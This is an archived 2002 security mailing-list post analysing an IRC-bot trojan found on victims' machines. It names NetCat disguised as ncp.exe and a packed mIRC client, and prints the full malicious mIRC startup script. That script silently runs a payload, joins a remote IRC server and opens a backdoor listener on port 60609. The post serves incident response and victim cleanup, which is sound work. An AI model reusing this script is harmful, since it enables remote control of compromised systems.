('binary' encoding is not supported, stored as-is) In-Reply-To: <F1E50062AEB5D411971E002035710A7304C3F950@MSXDENUSR01> One of the Microsoft PSS Security Specialist contacted me after reading my analysis. I gave them a copy of the virus/trojan/malware I analyzed, and I also expressed my concern about their analysis. I did not hear back from them yesterday, but maybe we should give them couple days. However, I still want to make sure everyone that was infected to run Anti-Trojan software to remove any trojan and hacker tools. It's detailed in my analysis. http://groups.google.com/groups?dq=&start=25&hl=zh-TW&lr=&ie=UTF-8&oe=UTF- 8&group=microsoft.public.scripting.virus.discussion&selm=bf0f8e77.020908070 6.7f395b0c%40posting.google.com I did point out that there was a file called "ncp.exe", which in fact was NetCat, one of hacker's favorite tool that could possibly allow a hacker to remote control the victims' systems... The other one is mt.exe, could be a dDoS agent (not confirmed). MS is aware of these situations. Let's make sure all the victims' out there are at least recovering their systems properly! Also, secedit.bat did NOT change the security policies. "DLL32NT.HLP" was the actual text (mirc script) file that caused the problems... Here is the actual script that got run: +++++++++++++ on *:start:{ if ($exists(mdm.exe) == $false) { exit } | //run mdm.exe /n /fh | //set %server DEM0N.daemon.sh | //set %timeout 10 | if ($portfree(60609) == $false) { exit } | if ($portfree(60609) == $true) { /socklisten blah 60609 } | //nick $read mdm.scr $+ $r(1,9) | //timerc 1 4 //server %server $+ : $+ 6667 | //run mdm.exe /n /fh | //remini NT32.ini ident userid | //remini NT32.ini mirc user | //remini NT32.ini mirc email | //writeini NT32.ini ident userid $read mdm.scr | //writeini NT32.ini mirc user $randomgen($r(0,9)) | //writeini NT32.ini mirc email $randomgen($r(0,9)) | //identd on $r(a,z) $+ $read mdm.scr $+ $r (a,z) | //timercoolconnect -o 0 100 //server %server 6667 | //timer 1 1 //run -n secedit /configure /DB secedit.sdb /cfg $mircdir $+ tftp8675 /quiet | fos } +++++++++++++ As I looked in further, the "designer" of this trojan/malware used "UPX Executable Packer" from http://upx.sourceforge.net to compact the taskmngr.exe (really a mirc 5.70 client), so it reduced the filesize from (1.3M) to 442K. It also compacted so well, there are very few ASCII characters to read from Hex Editor. Once you use UPX to decompress it, you can read a lot more. I am still trying to see if anything was modified. Please let me know if anyone find anything out there. I am not sure if the mirc client has been modified... The above script also opened a backdoor port 60609... If you have more info, please pass along. Regards, Kyle Lai, CISSP, CISA Kyle Lai Consulting aladin168at_private ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed Sep 11 2002 - 15:30:22 PDT